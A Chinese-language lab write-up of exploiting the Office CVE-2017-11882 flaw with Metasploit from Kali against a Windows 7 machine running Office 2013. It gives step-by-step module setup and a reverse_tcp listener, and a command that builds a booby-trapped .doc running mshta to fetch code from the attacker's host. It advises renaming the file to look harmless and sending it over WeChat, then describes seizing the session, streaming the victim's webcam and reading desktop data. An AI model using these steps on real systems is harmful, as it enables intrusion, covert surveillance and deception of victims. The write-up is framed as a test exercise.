1.測試環境
攻擊機:
OS:kail
IP:192.168.15.132/192.168.137.231
靶機:
OS:Windows7
Office版本:Office2013_CN
IP:
2.測試前准備
2.下載MSF
組件
3.將cve_2017_11882.rb
復制到/usr/share/metasploit-framework/modules/exploits/windows/smb/
目錄下
4.把下載的cve_2017_11882.rtf
復制到/usr/share/metasploit-framework/data/exploits/
目錄下
5.把Command109b_CVE-2017-11882.py
復制到/root
目錄下
3.測試過程
3.1虛擬機環境測試
1.msfconsole
執行search
命令
2.設置payload
為reverse_tcp
,設置LHOST
為192.168.15.132
,設置URIPATH
為test
(之后利用python
腳本生成doc文件的時候也要使用相同路徑)
3.show options
顯示設置
4.exploit -j
運行
5.另開一個terminal
,python Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc
6.把生成的kail_help
復制到靶機中打開,是個空白文檔
7.回連成功
8.sessions -i 1
接管活動會話1,shell
可以看到已經成功滲透靶機
3.2局域網靶機測試
0.更改kail網絡鏈接模式由NAT->橋接
,獲得一個與靶機在同一網段下的IP192.168.137.231
1.更改一下LHOST
,重新生成一個doc文件,exploit -j
監聽
2.將文件改名為kail_help2.doc
通過微信發給靶機(隨便改啥,具有迷惑性就行)
3.靶機打開doc,Windows7防火牆處於打開狀態,無殺軟
4.攻擊機獲得回連,sessions -i 1
接管
5.webcam_stream
可以直接控制攝像頭進行直播
6.shell
中獲取靶機桌面信息
4.測試感想
- 前人栽樹,后人乘涼。
github
和meterpreter-db
上有漏洞相關的msf模塊
和python腳本
可以直接使用 - 老舊系統、軟件十分不靠譜,易於攻入。其實還實踐了
WindowsDefender+Windows10
的組合,WinodowsDefender
會直接將doc文件殺掉,但是這個版本的WIN7還是應用很廣的,包括Office2013可以說是學生中應用十分廣泛的版本(這個Windwos鏡像和office2013都是徐日老師FTP服務器上的版本,在DKY安裝率應該還是很有保證的)